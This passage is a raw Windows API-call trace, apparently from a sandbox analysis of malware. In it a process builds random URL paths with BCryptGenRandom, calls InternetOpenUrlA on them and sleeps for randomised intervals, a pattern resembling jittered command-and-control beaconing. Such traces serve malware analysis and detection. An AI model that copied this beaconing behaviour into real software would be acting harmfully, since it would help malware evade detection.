lpString2="/fr5jnOpwqluBj58al0/53iqQvdxoTLag6xyiqAyp0iiqhuymvw2epi/522xH5nh8ggh5aiowgw/9hHpqb87sBxhARkjvs7Z0fad/o9vd7lnuamkv4Inix031qhMmAukpns9vebqsp8f2imy/" | out: lpString1="\x04/fr5jnOpwqluBj58al0/53iqQvdxoTLag6xyiqAyp0iiqhuymvw2epi/522xH5nh8ggh5aiowgw/9hHpqb87sBxhARkjvs7Z0fad/o9vd7lnuamkv4Inix031qhMmAukpns9vebqsp8f2imy/") returned="\x04/fr5jnOpwqluBj58al0/53iqQvdxoTLag6xyiqAyp0iiqhuymvw2epi/522xH5nh8ggh5aiowgw/9hHpqb87sBxhARkjvs7Z0fad/o9vd7lnuamkv4Inix031qhMmAukpns9vebqsp8f2imy/" [0230.830] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0230.831] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/fr5jnOpwqluBj58al0/53iqQvdxoTLag6xyiqAyp0iiqhuymvw2epi/522xH5nh8ggh5aiowgw/9hHpqb87sBxhARkjvs7Z0fad/o9vd7lnuamkv4Inix031qhMmAukpns9vebqsp8f2imy/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0230.831] GetProcessHeap () returned 0x440000 [0230.831] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473980 | out: hHeap=0x440000) returned 1 [0230.831] GetProcessHeap () returned 0x440000 [0230.831] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a03050 | out: hHeap=0x440000) returned 1 [0230.831] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0230.831] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0230.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0230.832] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0230.832] Sleep (dwMilliseconds=0x193e6) [0231.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0231.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0231.110] GetProcessHeap () returned 0x440000 [0231.110] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0231.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0231.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0231.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0231.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0231.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b26e, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x3a1b26e) returned 0x0 [0231.122] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.122] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.122] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.125] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.125] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.128] GetProcessHeap () returned 0x440000 [0231.128] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0231.128] lstrcpyA (in: lpString1=0x4726f0, lpString2="P²¡\x03" | out: lpString1="P²¡\x03") returned="P²¡\x03" [0231.128] lstrcatA (in: lpString1="P²¡\x03", lpString2="/at60zqtxfXvb0o7E7lsegebV18n7/eiamr8r01pr9c7dmXa210Ly8eI/" | out: lpString1="P²¡\x03/at60zqtxfXvb0o7E7lsegebV18n7/eiamr8r01pr9c7dmXa210Ly8eI/") returned="P²¡\x03/at60zqtxfXvb0o7E7lsegebV18n7/eiamr8r01pr9c7dmXa210Ly8eI/" [0231.128] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0231.128] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P²¡\x03/at60zqtxfXvb0o7E7lsegebV18n7/eiamr8r01pr9c7dmXa210Ly8eI/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0231.129] GetProcessHeap () returned 0x440000 [0231.129] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0231.129] GetProcessHeap () returned 0x440000 [0231.130] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0231.130] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0231.130] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0231.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0231.131] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0231.131] Sleep (dwMilliseconds=0x13cbc) [0231.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0231.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0231.414] GetProcessHeap () returned 0x440000 [0231.414] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b410 [0231.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0231.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b411, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x3a1b411) returned 0x0 [0231.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0231.420] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.420] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0231.421] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b42a, cbBuffer=0x1f, dwFlags=0x2 | out: pbBuffer=0x3a1b42a) returned 0x0 [0231.421] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.422] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.422] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.422] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, 